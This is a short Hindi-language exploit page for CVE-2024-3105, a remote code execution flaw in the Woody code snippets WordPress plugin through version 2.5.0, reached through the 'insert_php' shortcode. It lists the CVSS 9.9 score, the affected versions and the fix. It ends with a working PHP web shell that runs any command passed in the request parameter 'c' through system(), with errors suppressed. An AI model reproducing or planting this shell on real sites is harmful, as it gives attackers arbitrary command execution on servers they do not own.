
CVE-2024-3105 के लिए एक PoC एक्सप्लॉइट - वर्डप्रेस के लिए Woody code snippets – Insert Header Footer Code, AdSense Ads प्लगइन में रिमोट कोड एक्ज़ीक्यूशन (RCE)
वुडी कोड स्निपेट्स – इन्सर्ट हेडर फुटर कोड, AdSense Ads प्लगइन (WordPress के लिए) 2.5.0 तक (और इसे शामिल करते हुए) सभी संस्करणों में 'insert_php' शॉर्टकोड के माध्यम से रिमोट कोड निष्पादन के लिए संवेदनशील है। ऐसा इसलिए है क्योंकि प्लगइन इस कार्यक्षमता के उपयोग को उच्च-स्तरीय अधिकृत उपयोगकर्ताओं तक सीमित नहीं करता है। यह प्रमाणित हमलावरों के लिए, योगदानकर्ता-स्तर और उससे ऊपर की पहुँच के साथ, सर्वर पर कोड निष्पादित करना संभव बनाता है।
आधार स्कोर: 9.9 CRITICAL
वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
सॉफ़्टवेयर प्रकार: प्लगइन
सॉफ़्टवेयर स्लग: insert-php
निवारण: संस्करण 2.5.1, या इससे नया पैच किया गया संस्करण अपडेट करें
प्रभावित संस्करण: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>